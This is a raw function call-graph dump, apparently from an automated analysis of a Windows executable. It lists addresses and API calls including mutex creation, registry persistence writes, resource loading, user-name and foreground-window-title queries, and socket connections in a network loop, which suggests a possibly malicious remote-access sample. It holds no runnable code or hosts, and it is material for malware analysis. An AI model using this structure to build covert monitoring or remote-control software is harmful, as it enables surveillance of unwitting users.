47546->47542 47547 44f19b GetCPInfo 47546->47547 47547->47542 47547->47549 47577 44edc4 GetCPInfo 47549->47577 47550->47495 47551->47483 47552->47492 47553->47495 47554->47501 47555->47502 47556->47508 47557->47507 47558->47513 47559->47516 47560->47514 47561->47524 47562->47524 47563->47524 47564->47524 47566 43a7d4 47565->47566 47572 43a7ca 47565->47572 47567 448215 __Toupper 36 API calls 47566->47567 47566->47572 47568 43a7f5 47567->47568 47573 448364 36 API calls __Toupper 47568->47573 47570 43a80e 47574 448391 36 API calls __cftof 47570->47574 47572->47529 47572->47530 47573->47570 47574->47572 47575->47538 47576->47537 47583 44edfe 47577->47583 47586 44eea8 47577->47586 47580 434fcb __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 47582 44ef54 47580->47582 47582->47542 47587 45112c 47583->47587 47585 44ae66 _swprintf 41 API calls 47585->47586 47586->47580 47588 43a7b7 __cftof 36 API calls 47587->47588 47589 45114c MultiByteToWideChar 47588->47589 47591 451222 47589->47591 47592 45118a 47589->47592 47593 434fcb __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 47591->47593 47594 446137 ___crtLCMapStringA 21 API calls 47592->47594 47598 4511ab __alloca_probe_16 ___scrt_get_show_window_mode 47592->47598 47595 44ee5f 47593->47595 47594->47598 47601 44ae66 47595->47601 47596 45121c 47606 435e40 20 API calls _free 47596->47606 47598->47596 47599 4511f0 MultiByteToWideChar 47598->47599 47599->47596 47600 45120c GetStringTypeW 47599->47600 47600->47596 47602 43a7b7 __cftof 36 API calls 47601->47602 47603 44ae79 47602->47603 47607 44ac49 47603->47607 47606->47591 47608 44ac64 ___crtLCMapStringA 47607->47608 47609 44ac8a MultiByteToWideChar 47608->47609 47610 44acb4 47609->47610 47620 44ae3e 47609->47620 47612 44acd5 __alloca_probe_16 47610->47612 47614 446137 ___crtLCMapStringA 21 API calls 47610->47614 47611 434fcb __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 47613 44ae51 47611->47613 47615 44ad1e MultiByteToWideChar 47612->47615 47630 44ad8a 47612->47630 47613->47585 47614->47612 47616 44ad37 47615->47616 47615->47630 47634 448bb3 47616->47634 47620->47611 47621 44ad61 47623 448bb3 _strftime 11 API calls 47621->47623 47621->47630 47622 44ad99 47625 446137 ___crtLCMapStringA 21 API calls 47622->47625 47628 44adba __alloca_probe_16 47622->47628 47623->47630 47624 44ae2f 47642 435e40 20 API calls _free 47624->47642 47625->47628 47626 448bb3 _strftime 11 API calls 47629 44ae0e 47626->47629 47628->47624 47628->47626 47629->47624 47631 44ae1d WideCharToMultiByte 47629->47631 47643 435e40 20 API calls _free 47630->47643 47631->47624 47632 44ae5d 47631->47632 47644 435e40 20 API calls _free 47632->47644 47635 4484ca __Toupper 5 API calls 47634->47635 47636 448bda 47635->47636 47639 448be3 47636->47639 47645 448c3b 10 API calls 3 library calls 47636->47645 47638 448c23 LCMapStringW 47638->47639 47640 434fcb __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 47639->47640 47641 448c35 47640->47641 47641->47621 47641->47622 47641->47630 47642->47630 47643->47620 47644->47630 47645->47638 47647 41cb8f LoadLibraryA GetProcAddress 47646->47647 47648 41cb7f GetModuleHandleA GetProcAddress 47646->47648 47649 41cbb8 44 API calls 47647->47649 47650 41cba8 LoadLibraryA GetProcAddress 47647->47650 47648->47647 47649->47127 47650->47649 48067 41b4a8 FindResourceA 47651->48067 47655 40f3ed ctype 48077 4020b7 47655->48077 47658 401fe2 28 API calls 47659 40f413 47658->47659 47660 401fd8 11 API calls 47659->47660 47661 40f41c 47660->47661 47662 43bd51 new 21 API calls 47661->47662 47663 40f42d ctype 47662->47663 48083 406dd8 47663->48083 47665 40f460 47665->47129 47667 40210c 47666->47667 47668 4023ce 11 API calls 47667->47668 47669 402126 47668->47669 47670 402569 28 API calls 47669->47670 47671 402134 47670->47671 47671->47132 48120 4020df 47672->48120 47674 401fd8 11 API calls 47675 41bed0 47674->47675 47677 401fd8 11 API calls 47675->47677 47676 41bea0 47678 4041a2 28 API calls 47676->47678 47680 41bed8 47677->47680 47681 41beac 47678->47681 47682 401fd8 11 API calls 47680->47682 47683 401fe2 28 API calls 47681->47683 47685 40ea24 47682->47685 47686 41beb5 47683->47686 47684 401fe2 28 API calls 47690 41be2e 47684->47690 47694 40fb17 47685->47694 47687 401fd8 11 API calls 47686->47687 47689 41bebd 47687->47689 47688 401fd8 11 API calls 47688->47690 47691 41ce34 28 API calls 47689->47691 47690->47676 47690->47684 47690->47688 47693 41be9e 47690->47693 48124 4041a2 47690->48124 48127 41ce34 47690->48127 47691->47693 47693->47674 47695 40fb23 47694->47695 47697 40fb2a 47694->47697 48169 402163 11 API calls 47695->48169 47697->47137 47699 402163 47698->47699 47700 40219f 47699->47700 48170 402730 11 API calls 47699->48170 47700->47139 47702 402184 48171 402712 11 API calls std::_Deallocate 47702->48171 47705 401e6d 47704->47705 47707 401e75 47705->47707 48172 402158 22 API calls 47705->48172 47707->47144 47710 4020df 11 API calls 47709->47710 47711 40532a 47710->47711 48173 4032a0 47711->48173 47713 405346 47713->47152 48178 4051ef 47714->48178 47716 406391 48182 402055 47716->48182 47719 401fe2 47720 401ff1 47719->47720 47727 402039 47719->47727 47721 4023ce 11 API calls 47720->47721 47722 401ffa 47721->47722 47723 402015 47722->47723 47724 40203c 47722->47724 48216 403098 28 API calls 47723->48216 47725 40267a 11 API calls 47724->47725 47725->47727 47728 401fd8 47727->47728 47729 4023ce 11 API calls 47728->47729 47730 401fe1 47729->47730 47730->47164 47732 401fd2 47731->47732 47733 401fc9 47731->47733 47732->47170 48217 4025e0 28 API calls 47733->48217 48218 401fab 47735->48218 47737 40d073 CreateMutexA GetLastError 47737->47186 48219 41bfb7 47738->48219 47743 401fe2 28 API calls 47744 41b2ff 47743->47744 47745 401fd8 11 API calls 47744->47745 47746 41b307 47745->47746 47747 4135a6 31 API calls 47746->47747 47749 41b35d 47746->47749 47748 41b330 47747->47748 47750 41b33b StrToIntA 47748->47750 47749->47193 47751 41b352 47750->47751 47752 41b349 47750->47752 47754 401fd8 11 API calls 47751->47754 48227 41cf69 22 API calls 47752->48227 47754->47749 47756 40772a 47755->47756 47757 413549 3 API calls 47756->47757 47758 407731 47757->47758 47758->47203 47758->47204 47760 41bc72 47759->47760 48228 40b904 47760->48228 47762 41bc7a 47762->47220 47764 401f22 47763->47764 47771 401f6a 47763->47771 47765 402252 11 API calls 47764->47765 47766 401f2b 47765->47766 47767 401f6d 47766->47767 47768 401f46 47766->47768 48261 402336 47767->48261 48260 40305c 28 API calls 47768->48260 47772 401f09 47771->47772 47773 402252 11 API calls 47772->47773 47774 401f12 47773->47774 47774->47232 47776 413965 47775->47776 47777 406dd8 28 API calls 47776->47777 47778 41397a 47777->47778 47779 4020f6 28 API calls 47778->47779 47780 41398a 47779->47780 47781 41376f 14 API calls 47780->47781 47782 413994 47781->47782 47783 401fd8 11 API calls 47782->47783 47784 4139a1 47783->47784 47784->47281 47786 40209b 47785->47786 47787 4023ce 11 API calls 47786->47787 47788 4020a6 47787->47788 48265 4024ed 47788->48265 47792 4137bf 47791->47792 47793 413788 47791->47793 47794 401fd8 11 API calls 47792->47794 47796 41379a RegSetValueExA RegCloseKey 47793->47796 47795 40ef9e 47794->47795 47795->47283 47796->47792 47798 43bac5 _strftime 47797->47798 48269 43ae03 47798->48269 47800 40efb7 47800->47290 47800->47292 47802 41b5a0 47801->47802 47803 41b505 GetLocalTime 47801->47803 47805 401fd8 11 API calls 47802->47805 47804 40531e 28 API calls 47803->47804 47806 41b547 47804->47806 47807 41b5a8 47805->47807 47808 406383 28 API calls 47806->47808 47809 401fd8 11 API calls 47807->47809 47811 41b553 47808->47811 47810 40f00d 47809->47810 47810->47307 48296 402f10 47811->48296 47814 406383 28 API calls 47815 41b56b 47814->47815 48301 407200 77 API calls 47815->48301 47817 41b579 47818 401fd8 11 API calls 47817->47818 47819 41b585 47818->47819 47820 401fd8 11 API calls 47819->47820 47821 41b58e 47820->47821 47822 401fd8 11 API calls 47821->47822 47823 41b597 47822->47823 47824 401fd8 11 API calls 47823->47824 47824->47802 47826 409e02 _wcslen 47825->47826 47827 409e24 47826->47827 47828 409e0d 47826->47828 47830 40da34 31 API calls 47827->47830 47829 40da34 31 API calls 47828->47829 47831 409e15 47829->47831 47832 409e2c 47830->47832 47833 401f13 28 API calls 47831->47833 47834 401f13 28 API calls 47832->47834 47836 409e1f 47833->47836 47835 409e3a 47834->47835 47837 401f09 11 API calls 47835->47837 47839 401f09 11 API calls 47836->47839 47838 409e42 47837->47838 48320 40915b 28 API calls 47838->48320 47841 409e79 47839->47841 48305 40a109 47841->48305 47842 409e54 48321 403014 47842->48321 47847 401f13 28 API calls 47848 409e69 47847->47848 47849 401f09 11 API calls 47848->47849 47849->47836 47851 41b630 GetUserNameW 47850->47851 48373 40417e 47851->48373 47856 403014 28 API calls 47857 41b672 47856->47857 47858 401f09 11 API calls 47857->47858 47859 41b67b 47858->47859 47860 401f09 11 API calls 47859->47860 47861 40f223 47860->47861 47861->47360 47863 413520 RegQueryValueExA RegCloseKey 47862->47863 47864 40f2e4 47862->47864 47863->47864 47864->47233 47864->47388 47866 40f392 47865->47866 47867 413a3f RegDeleteValueW 47865->47867 47866->47226 47867->47866 47869 40dd5b 47868->47869 47870 4134ff 3 API calls 47869->47870 47871 40dd62 47870->47871 47872 40dd81 47871->47872 48467 401707 47871->48467 47876 414f2a 47872->47876 47874 40dd6f 48470 413877 RegCreateKeyA 47874->48470 47877 4020df 11 API calls 47876->47877 47878 414f3e 47877->47878 48490 41b8b3 47878->48490 47881 4020df 11 API calls 47882 414f54 47881->47882 47883 401e65 22 API calls 47882->47883 47884 414f62 47883->47884 47885 43baac _strftime 40 API calls 47884->47885 47886 414f6f 47885->47886 47887 414f81 47886->47887 47888 414f74 Sleep 47886->47888 47889 402093 28 API calls 47887->47889 47888->47887 47890 414f90 47889->47890 47891 401e65 22 API calls 47890->47891 47892 414f99 47891->47892 47893 4020f6 28 API calls 47892->47893 47894 414fa4 47893->47894 47895 41be1b 28 API calls 47894->47895 47896 414fac 47895->47896 48494 40489e WSAStartup 47896->48494 47898 414fb6 47899 401e65 22 API calls 47898->47899 47900 414fbf 47899->47900 47901 401e65 22 API calls 47900->47901 47949 41503e 47900->47949 47902 414fd8 47901->47902 47903 401e65 22 API calls 47902->47903 47905 414fe9 47903->47905 47904 4020f6 28 API calls 47904->47949 47907 401e65 22 API calls 47905->47907 47906 41be1b 28 API calls 47906->47949 47908 414ffa 47907->47908 47910 401e65 22 API calls 47908->47910 47909 406c1e 28 API calls 47909->47949 47911 41500b 47910->47911 47913 401e65 22 API calls 47911->47913 47912 401fe2 28 API calls 47912->47949 47914 41501c 47913->47914 47915 401e65 22 API calls 47914->47915 47916 41502e 47915->47916 48638 40473d 89 API calls 47916->48638 47918 401fd8 11 API calls 47918->47949 47919 401e65 22 API calls 47919->47949 47921 41518c WSAGetLastError 48639 41cae1 30 API calls 47921->48639 47926 402093 28 API calls 47971 41519c 47926->47971 47928 41b4ef 80 API calls 47928->47971 47930 40531e 28 API calls 47930->47949 47931 401e65 22 API calls 47931->47971 47932 401e8d 11 API calls 47932->47971 47933 406383 28 API calls 47933->47949 47934 43baac _strftime 40 API calls 47935 415acf Sleep 47934->47935 47935->47971 47936 402f10 28 API calls 47936->47949 47937 402093 28 API calls 47937->47949 47938 41b4ef 80 API calls 47938->47949 47941 40905c 28 API calls 47941->47949 47943 4136f8 3 API calls 47943->47949 47944 4135a6 31 API calls 47944->47949 47945 40417e 28 API calls 47945->47949 47949->47904 47949->47906 47949->47909 47949->47912 47949->47918 47949->47919 47949->47921 47949->47930 47949->47933 47949->47936 47949->47937 47949->47938 47949->47941 47949->47943 47949->47944 47949->47945 47951 401e65 22 API calls 47949->47951 47949->47971 48495 414ee9 47949->48495 48500 40482d 47949->48500 48507 404f51 47949->48507 48522 4048c8 connect 47949->48522 48582 41b7e0 47949->48582 48585 4145bd 47949->48585 48588 441e81 47949->48588 48592 40dd89 47949->48592 48598 41bc42 47949->48598 48601 41bd1e 47949->48601 48605 41bb8e 47949->48605 47952 415439 GetTickCount 47951->47952 47953 41bb8e 28 API calls 47952->47953 47966 415456 47953->47966 47955 41bb8e 28 API calls 47955->47966 47958 41bd1e 28 API calls 47958->47966 47960 402ea1 28 API calls 47960->47966 47961 406383 28 API calls 47961->47966 47962 402f10 28 API calls 47962->47966 47964 401fd8 11 API calls 47964->47966 47965 401f09 11 API calls 47965->47966 47966->47955 47966->47958 47966->47960 47966->47961 47966->47962 47966->47964 47966->47965 48610 41bae6 47966->48610 48612 41ba96 47966->48612 48617 40f8d1 29 API calls 47966->48617 48618 402f31 28 API calls 47966->48618 48619 404c10 47966->48619 48641 404aa1 61 API calls ctype 47966->48641 47969 415a71 CreateThread 47969->47971 48831 41ad17 105 API calls 47969->48831 47970 401fd8 11 API calls 47970->47971 47971->47926 47971->47928 47971->47931 47971->47932 47971->47934 47971->47949 47971->47969 47971->47970 47972 401f09 11 API calls 47971->47972 48640 4052fd 28 API calls 47971->48640 48642 40b051 85 API calls 47971->48642 48643 404e26 99 API calls 47971->48643 47972->47971 47973->47145 47974->47153 47975->47157 47978 4020df 11 API calls 47977->47978 47979 406c2a 47978->47979 47980 4032a0 28 API calls 47979->47980 47981 406c47 47980->47981 47981->47178 47983 40eba4 47982->47983 47984 413573 RegQueryValueExA RegCloseKey 47982->47984 47983->47175 47983->47192 47984->47983 47985->47181 47986->47211 47987->47204 47988->47196 47989->47209 48832 401f86 47990->48832 47993 40da70 48836 41b5b4 29 API calls 47993->48836 47994 40daa5 47998 41bfb7 GetCurrentProcess 47994->47998 47996 40da66 47997 40db99 GetLongPathNameW 47996->47997 48000 40417e 28 API calls 47997->48000 48001 40daaa 47998->48001 47999 40da79 48002 401f13 28 API calls 47999->48002 48003 40dbae 48000->48003 48004 40db00 48001->48004 48005 40daae 48001->48005 48043 40da83 48002->48043 48006 40417e 28 API calls 48003->48006 48007 40417e 28 API calls 48004->48007 48008 40417e 28 API calls 48005->48008 48009 40dbbd 48006->48009 48010 40db0e 48007->48010 48011 40dabc 48008->48011 48839 40ddd1 28 API calls 48009->48839 48015 40417e 28 API calls 48010->48015 48016 40417e 28 API calls 48011->48016 48012 401f09 11 API calls 48012->47996 48014 40dbd0 48840 402fa5 28 API calls 48014->48840 48018 40db24 48015->48018 48019 40dad2 48016->48019 48838 402fa5 28 API calls 48018->48838 48837 402fa5 28 API calls 48019->48837 48020 40dbdb 48841 402fa5 28 API calls 48020->48841 48024 40dbe5 48027 401f09 11 API calls 48024->48027 48025 40db2f 48028 401f13 28 API calls 48025->48028 48026 40dadd 48029 401f13 28 API calls 48026->48029 48030 40dbef 48027->48030 48031 40db3a 48028->48031 48032 40dae8 48029->48032 48033 401f09 11 API calls 48030->48033 48034 401f09 11 API calls 48031->48034 48035 401f09 11 API calls 48032->48035 48036 40dbf8 48033->48036 48037 40db43 48034->48037 48038 40daf1 48035->48038 48039 401f09 11 API calls 48036->48039 48040 401f09 11 API calls 48037->48040 48041 401f09 11 API calls 48038->48041 48042 40dc01 48039->48042 48040->48043 48041->48043 48044 401f09 11 API calls 48042->48044 48043->48012 48045 40dc0a 48044->48045 48046 401f09 11 API calls 48045->48046 48047 40dc13 48046->48047 48047->47269 48048->47282 48049->47303 48051 41371e RegQueryValueExA RegCloseKey 48050->48051 48052 413742 48050->48052 48051->48052 48052->47262 48053->47297 48056 4344ef 48054->48056 48055 43bd51 new 21 API calls 48055->48056 48056->48055 48057 40f0d1 48056->48057 48842 442f80 7 API calls 2 library calls 48056->48842 48843 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48056->48843 48844 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48056->48844 48057->47334 48061->47365 48062->47353 48064->47397 48065->47202 48068 41b4c5 LoadResource LockResource SizeofResource 48067->48068 48069 40f3de 48067->48069 48068->48069 48070 43bd51 48069->48070 48075 446137 __Getctype 48070->48075 48071 446175 48087 4405dd 20 API calls __dosmaperr 48071->48087 48073 446160 RtlAllocateHeap 48074 446173 48073->48074 48073->48075 48074->47655 48075->48071 48075->48073 48086 442f80 7 API calls 2 library calls 48075->48086 48078 4020bf 48077->48078 48088 4023ce 48078->48088 48080 4020ca 48092 40250a 48080->48092 48082 4020d9 48082->47658 48084 4020b7 28 API calls 48083->48084 48085 406dec 48084->48085 48085->47665 48086->48075 48087->48074 48089 402428 48088->48089 48090 4023d8 48088->48090 48089->48080 48090->48089 48099 4027a7 11 API calls std::_Deallocate 48090->48099 48093 40251a 48092->48093 48094 402520 48093->48094 48095 402535 48093->48095 48100 402569 48094->48100 48110 4028e8 28 API calls 48095->48110 48098 402533 48098->48082 48099->48089 48111 402888 48100->48111 48102 40257d 48103 402592 48102->48103 48104 4025a7 48102->48104 48116 402a34 22 API calls 48103->48116 48118 4028e8 28 API calls 48104->48118 48107 40259b 48117 4029da 22 API calls 48107->48117 48109 4025a5 48109->48098 48110->48098 48112 402890 48111->48112 48113 402898 48112->48113 48119 402ca3 22 API calls 48112->48119 48113->48102 48116->48107 48117->48109 48118->48109 48121 4020e7 48120->48121 48122 4023ce 11 API calls 48121->48122 48123 4020f2 48122->48123 48123->47690 48138 40423a 48124->48138 48128 41ce41 48127->48128 48129 41cea0 48128->48129 48133 41ce51 48128->48133 48130 41ceba 48129->48130 48131 41cfe0 28 API calls 48129->48131 48153 41d146 28 API calls 48130->48153 48131->48130 48135 41ce89 48133->48135 48144 41cfe0 48133->48144 48152 41d146 28 API calls 48135->48152 48137 41ce9c 48137->47690 48139 404243 48138->48139 48140 4023ce 11 API calls 48139->48140 48141 40424e 48140->48141 48142 402569 28 API calls 48141->48142 48143 4041b5 48142->48143 48143->47690 48146 41cfe8 48144->48146 48145 41d01a 48145->48135 48146->48145 48147 41d01e 48146->48147 48150 41d002 48146->48150 48164 402725 22 API calls 48147->48164 48154 41d051 48150->48154 48152->48137 48153->48137 48155 41d05b __EH_prolog 48154->48155 48165 402717 22 API calls 48155->48165 48157 41d06e 48166 41d15d 11 API calls 48157->48166 48159 41d094 48160 41d0cc 48159->48160 48167 402730 11 API calls 48159->48167 48160->48145 48162 41d0b3 48168 402712 11 API calls std::_Deallocate 48162->48168 48165->48157 48166->48159 48167->48162 48168->48160 48169->47697 48170->47702 48171->47700 48175 4032aa 48173->48175 48174 4032c9 48174->47713 48175->48174 48177 4028e8 28 API calls 48175->48177 48177->48174 48179 4051fb 48178->48179 48188 405274 48179->48188 48181 405208 48181->47716 48183 402061 48182->48183 48184 4023ce 11 API calls 48183->48184 48185 40207b 48184->48185 48212 40267a 48185->48212 48189 405282 48188->48189 48190 405288 48189->48190 48191 40529e 48189->48191 48199 4025f0 48190->48199 48193 4052f5 48191->48193 48194 4052b6 48191->48194 48209 4028a4 22 API calls 48193->48209 48198 40529c 48194->48198 48208 4028e8 28 API calls 48194->48208 48198->48181 48200 402888 22 API calls 48199->48200 48201 402602 48200->48201 48202 402672 48201->48202 48203 402629 48201->48203 48211 4028a4 22 API calls 48202->48211 48207 40263b 48203->48207 48210 4028e8 28 API calls 48203->48210 48207->48198 48208->48198 48210->48207 48213 40268b 48212->48213 48214 4023ce 11 API calls 48213->48214 48215 40208d 48214->48215 48215->47719 48216->47727 48217->47732 48220 41bfc4 GetCurrentProcess 48219->48220 48221 41b2d1 48219->48221 48220->48221 48222 4135a6 RegOpenKeyExA 48221->48222 48223 4135d4 RegQueryValueExA RegCloseKey 48222->48223 48224 4135fe 48222->48224 48223->48224 48225 402093 28 API calls 48224->48225 48226 413613 48225->48226 48226->47743 48227->47751 48229 40b90c 48228->48229 48234 402252 48229->48234 48231 40b917 48238 40b92c 48231->48238 48233 40b926 48233->47762 48235 4022ac 48234->48235 48236 40225c 48234->48236 48235->48231 48236->48235 48245 402779 11 API calls std::_Deallocate 48236->48245 48239 40b966 48238->48239 48240 40b938 48238->48240 48257 4028a4 22 API calls 48239->48257 48246 4027e6 48240->48246 48244 40b942 48244->48233 48245->48235 48247 4027ef 48246->48247 48248 402851 48247->48248 48249 4027f9 48247->48249 48259 4028a4 22 API calls 48248->48259 48252 402802 48249->48252 48254 402815 48249->48254 48258 402aea 28 API calls __EH_prolog 48252->48258 48255 402813 48254->48255 48256 402252 11 API calls 48254->48256 48255->48244 48256->48255 48258->48255 48260->47771 48262 402347 48261->48262 48263 402252 11 API calls 48262->48263 48264 4023c7 48263->48264 48264->47771 48266 4024f9 48265->48266 48267 40250a 28 API calls 48266->48267 48268 4020b1 48267->48268 48268->47275 48285 43ba0a 48269->48285 48271 43ae50 48272 43a7b7 __cftof 36 API calls 48271->48272 48277 43ae5c 48272->48277 48273 43ae15 48273->48271 48274 43ae2a 48273->48274 48284 43ae2f __wsopen_s 48273->48284 48290 4405dd 20 API calls __dosmaperr 48274->48290 48278 43ae8b 48277->48278 48291 43ba4f 40 API calls __Toupper 48277->48291 48281 43aef7 48278->48281 48292 43b9b6 20 API calls 2 library calls 48278->48292 48293 43b9b6 20 API calls 2 library calls 48281->48293 48282 43afbe _strftime 48282->48284 48294 4405dd 20 API calls __dosmaperr 48282->48294 48284->47800 48286 43ba22 48285->48286 48287 43ba0f 48285->48287 48286->48273 48295 4405dd 20 API calls __dosmaperr 48287->48295 48289 43ba14 __wsopen_s 48289->48273 48290->48284 48291->48277 48292->48281 48293->48282 48294->48284 48295->48289 48302 401fb0 48296->48302 48298 402f1e 48299 402055 11 API calls 48298->48299 48300 402f2d 48299->48300 48300->47814 48301->47817 48303 4025f0 28 API calls 48302->48303 48304 401fbd 48303->48304 48304->48298 48306 40a127 48305->48306 48307 413549 3 API calls 48306->48307 48308 40a12e 48307->48308 48309 40a142 48308->48309 48310 40a15c 48308->48310 48312 409e9b 48309->48312 48313 40a147 48309->48313 48311 40905c 28 API calls 48310->48311 48315 40a16a 48311->48315 48312->47326 48326 40905c 48313->48326 48333 40a179 86 API calls 48315->48333 48319 40a15a 48319->48312 48320->47842 48350 403222 48321->48350 48323 403022 48354 403262 48323->48354 48327 409072 48326->48327 48328 402252 11 API calls 48327->48328 48329 40908c 48328->48329 48334 404267 48329->48334 48331 40909a 48332 40a22d 29 API calls 48331->48332 48332->48319 48346 40a273 163 API calls 48332->48346 48333->48312 48347 40a267 86 API calls 48333->48347 48348 40a289 48 API calls 48333->48348 48349 40a27d 128 API calls 48333->48349 48335 402888 22 API calls 48334->48335 48336 40427b 48335->48336 48337 404290 48336->48337 48338 4042a5 48336->48338 48344 4042df 22 API calls 48337->48344 48340 4027e6 28 API calls 48338->48340 48343 4042a3 48340->48343 48341 404299 48345 402c48 22 API calls 48341->48345 48343->48331 48344->48341 48345->48343 48351 40322e 48350->48351 48360 403618 48351->48360 48353 40323b 48353->48323 48355 40326e 48354->48355 48356 402252 11 API calls 48355->48356 48357 403288 48356->48357 48358 402336 11 API calls 48357->48358 48359 403031 48358->48359 48359->47847 48361 403626 48360->48361 48362 403644 48361->48362 48363 40362c 48361->48363 48365 40369e 48362->48365 48367 40365c 48362->48367 48371 4036a6 28 API calls 48363->48371 48372 4028a4 22 API calls 48365->48372 48368 4027e6 28 API calls 48367->48368 48370 403642 48367->48370 48368->48370 48370->48353 48371->48370 48374 404186 48373->48374 48375 402252 11 API calls 48374->48375 48376 404191 48375->48376 48384 4041bc 48376->48384 48379 4042fc 48395 404353 48379->48395 48381 40430a 48382 403262 11 API calls 48381->48382 48383 404319 48382->48383 48383->47856 48385 4041c8 48384->48385 48388 4041d9 48385->48388 48387 40419c 48387->48379 48389 4041e9 48388->48389 48390 404206 48389->48390 48391 4041ef 48389->48391 48392 4027e6 28 API calls 48390->48392 48393 404267 28 API calls 48391->48393 48394 404204 48392->48394 48393->48394 48394->48387 48396 40435f 48395->48396 48399 404371 48396->48399 48398 40436d 48398->48381 48400 40437f 48399->48400 48401 40439e 48400->48401 48403 404385 48400->48403 48402 402888 22 API calls 48401->48402 48404 4043a6 48402->48404 48465 4034e6 28 API calls 48403->48465 48406 404419 48404->48406 48407 4043bf 48404->48407 48466 4028a4 22 API calls 48406->48466 48409 4027e6 28 API calls 48407->48409 48418 40439c 48407->48418 48409->48418 48418->48398 48465->48418 48473 43aa9a 48467->48473 48471 4138b9 48470->48471 48472 41388f RegSetValueExA RegCloseKey 48470->48472 48471->47872 48472->48471 48476 43aa1b 48473->48476 48475 40170d 48475->47874 48477 43aa2a 48476->48477 48478 43aa3e 48476->48478 48489 4405dd 20 API calls __dosmaperr 48477->48489 48481 43aa2f __alldvrm __wsopen_s 48478->48481 48482 448957 48478->48482 48481->48475 48483 4484ca __Toupper 5 API calls 48482->48483 48484 44897e 48483->48484 48485 448996 GetSystemTimeAsFileTime 48484->48485 48486 44898a 48484->48486 48485->48486 48487 434fcb __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 48486->48487 48488 4489a7 48487->48488 48488->48481 48489->48481 48493 41b8f9 ctype ___scrt_get_show_window_mode 48490->48493 48491 402093 28 API calls 48492 414f49 48491->48492 48492->47881 48493->48491 48494->47898 48496 414f02 getaddrinfo WSASetLastError 48495->48496 48497 414ef8 48495->48497 48496->47949 48644 414d86 48497->48644 48501 404846 socket 48500->48501 48502 404839 48500->48502 48504 404860 CreateEventW 48501->48504 48505 404842 48501->48505 48683 40489e WSAStartup 48502->48683 48504->47949 48505->47949 48506 40483e 48506->48501 48506->48505 48508 404f65 48507->48508 48509 404fea 48507->48509 48510 404f6e 48508->48510 48511 404fc0 CreateEventA CreateThread 48508->48511 48512 404f7d GetLocalTime 48508->48512 48509->47949 48510->48511 48511->48509 48685 405150 48511->48685 48513 41bb8e 28 API calls 48512->48513 48514 404f91 48513->48514 48684 4052fd 28 API calls 48514->48684 48523 404a1b 48522->48523 48524 4048ee 48522->48524 48525 40497e 48523->48525 48526 404a21 WSAGetLastError 48523->48526 48524->48525 48527 404923 48524->48527 48530 40531e 28 API calls 48524->48530 48525->47949 48526->48525 48528 404a31 48526->48528 48689 420c60 27 API calls 48527->48689 48531 404932 48528->48531 48532 404a36 48528->48532 48535 40490f 48530->48535 48538 402093 28 API calls 48531->48538 48694 41cae1 30 API calls 48532->48694 48534 40492b 48534->48531 48537 404941 48534->48537 48539 402093 28 API calls 48535->48539 48536 404a40 48695 4052fd 28 API calls 48536->48695 48547 404950 48537->48547 48548 404987 48537->48548 48542 404a80 48538->48542 48540 40491e 48539->48540 48543 41b4ef 80 API calls 48540->48543 48545 402093 28 API calls 48542->48545 48543->48527 48549 404a8f 48545->48549 48553 402093 28 API calls 48547->48553 48691 421a40 54 API calls 48548->48691 48550 41b4ef 80 API calls 48549->48550 48550->48525 48556 40495f 48553->48556 48555 40498f 48558 4049c4 48555->48558 48559 404994 48555->48559 48560 402093 28 API calls 48556->48560 48693 420e06 28 API calls 48558->48693 48563 402093 28 API calls 48559->48563 48564 40496e 48560->48564 48566 4049a3 48563->48566 48567 41b4ef 80 API calls 48564->48567 48565 4049cc 48569 4049f9 CreateEventW CreateEventW 48565->48569 48571 402093 28 API calls 48565->48571 48570 402093 28 API calls 48566->48570 48568 404973 48567->48568 48690 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48568->48690 48569->48525 48572 4049b2 48570->48572 48574 4049e2 48571->48574 48575 41b4ef 80 API calls 48572->48575 48576 402093 28 API calls 48574->48576 48577 4049b7 48575->48577 48578 4049f1 48576->48578 48692 4210b2 52 API calls 48577->48692 48580 41b4ef 80 API calls 48578->48580 48581 4049f6 48580->48581 48581->48569 48696 41b7b6 GlobalMemoryStatusEx 48582->48696 48584 41b7f5 48584->47949 48697 414580 48585->48697 48589 441e8d 48588->48589 48726 441c7d 48589->48726 48591 441eae 48591->47949 48593 40dda5 48592->48593 48594 4134ff 3 API calls 48593->48594 48596 40ddac 48594->48596 48595 40ddc4 48595->47949 48596->48595 48597 413549 3 API calls 48596->48597 48597->48595 48599 4020b7 28 API calls 48598->48599 48600 41bc57 48599->48600 48600->47949 48602 41bd2b 48601->48602 48603 4020b7 28 API calls 48602->48603 48604 41bd3d 48603->48604 48604->47949 48606 441e81 20 API calls 48605->48606 48607 41bbb2 48606->48607 48608 402093 28 API calls 48607->48608 48609 41bbc0 48608->48609 48609->47949 48611 41bafc GetTickCount 48610->48611 48611->47966 48613 436e90 ___scrt_get_show_window_mode 48612->48613 48614 41bab5 GetForegroundWindow GetWindowTextW 48613->48614 48615 40417e 28 API calls 48614->48615 48616 41badf 48615->48616 48616->47966 48617->47966 48618->47966 48620 4020df 11 API calls 48619->48620 48621 404c27 48620->48621 48622 4020df 11 API calls 48621->48622 48635 404c30 48622->48635 48623 43bd51 new 21 API calls 48623->48635 48625 404c96 48627 404ca1 48625->48627 48625->48635 48626 4020b7 28 API calls 48626->48635 48744 404e26 99 API calls 48627->48744 48628 401fe2 28 API calls 48628->48635 48630 404ca8 48632 401fd8 11 API calls 48630->48632 48631 401fd8 11 API calls 48631->48635 48633 404cb1 48632->48633 48634 401fd8 11 API calls 48633->48634 48636 404cba 48634->48636 48635->48623 48635->48625 48635->48626 48635->48628 48635->48631 48731 404cc3 48635->48731 48743 404b96 57 API calls 48635->48743 48636->47971 48638->47949 48639->47971 48641->47966 48642->47971 48643->47971 48645 414dc8 GetSystemDirectoryA 48644->48645 48662 414ecf 48644->48662 48646 414de3 48645->48646 48645->48662 48665 441a3e 48646->48665 48648 414dff 48672 441a98 48648->48672 48650 414e0f LoadLibraryA 48651 414e31 GetProcAddress 48650->48651 48652 414e42 48650->48652 48651->48652 48653 414e3d FreeLibrary 48651->48653 48654 441a3e 